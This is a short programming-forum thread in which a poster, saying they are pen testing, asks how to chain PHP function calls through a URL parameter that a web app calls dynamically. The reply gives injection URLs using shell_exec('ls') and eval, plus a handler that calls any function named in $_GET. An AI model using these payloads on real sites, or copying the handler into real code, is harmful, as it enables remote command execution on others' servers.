PHP Concatenate Functions

This topic has 1 reply, 1 voice, and was last updated 8 years, 5 months ago by Amit.

PHP Concatenate Functions

RenaldoL25 Member February 4, 2016 at 3:24 pm
I have the following code:
So if i entered this url:
http://localhost/?function=phpinfo

I will see the phpinfo function output on the screen.

can i have a way to concatenate 2 function in the url like this example:

http://localhost/?function=shell_exec('ls') AND phpinfo

So i want to see the first function output..

If you may asking why i need this, is because i am pen testing an web application with this situation.
#9415

Amit Member February 4, 2016 at 3:25 pm

that looks very dangerous. you can pass a string separated with semicolon for each function, like:

http://localhost/?function=shell_exec('ls');phpinfo

then:

if(isset($_GET['function'])){
        $functions =  explode(';',$_GET['function']);
        foreach($functions as $function){
                $function();
        }
}

or you can use eval function:

http://localhost/?function=eval("shell_exec('ls');phpinfo();")

#9416

Viewing 1 reply thread

You must be logged in to reply to this topic.

PHP Concatenate Functions

Code with C: Your Ultimate Hub for Programming Tutorials, Projects, and Source Codes” is much more than just a website – it’s a vibrant, buzzing hive of coding knowledge and creativity.

Quick Link

Top Categories